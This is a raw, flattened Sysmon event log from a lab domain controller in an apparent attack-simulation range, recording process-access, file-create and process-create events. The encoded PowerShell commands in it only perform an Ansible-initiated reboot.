13:08:49.824{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-4261-6000-E702-000000009901}5056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.793{08A6967A-4261-6000-E702-000000009901}5056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gkadngwz.qjo.ps12021-01-14 13:08:49.793 10341000x8000000000000000531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.777{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4261-6000-E702-000000009901}5056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-4261-6000-E202-000000009901}27884380C:\Windows\system32\conhost.exe{08A6967A-4261-6000-E702-000000009901}5056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-40D2-6000-0500-000000009901}6443180C:\Windows\system32\csrss.exe{08A6967A-4261-6000-E702-000000009901}5056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.746{08A6967A-4261-6000-E602-000000009901}33644348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4261-6000-E702-000000009901}5056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d2a2515(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c74311f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c742df0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d1f46d5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c703986(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c761e55(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c7454ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c7454ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c74534b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c7372d0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c743803(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c7433f6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c74311f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c742df0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1d1f46d5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c729c51(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1c729221(wow64) 154100x8000000000000000518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.751{08A6967A-4261-6000-E702-000000009901}5056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA==C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4260-6000-168F-110000000000}0x118f160HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-4261-6000-E602-000000009901}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.699{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-4261-6000-E602-000000009901}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.699{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-4261-6000-E602-000000009901}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.652{08A6967A-4261-6000-E602-000000009901}3364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_czu1fpuv.deo.ps12021-01-14 13:08:49.652 10341000x8000000000000000514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.637{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:49.637{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 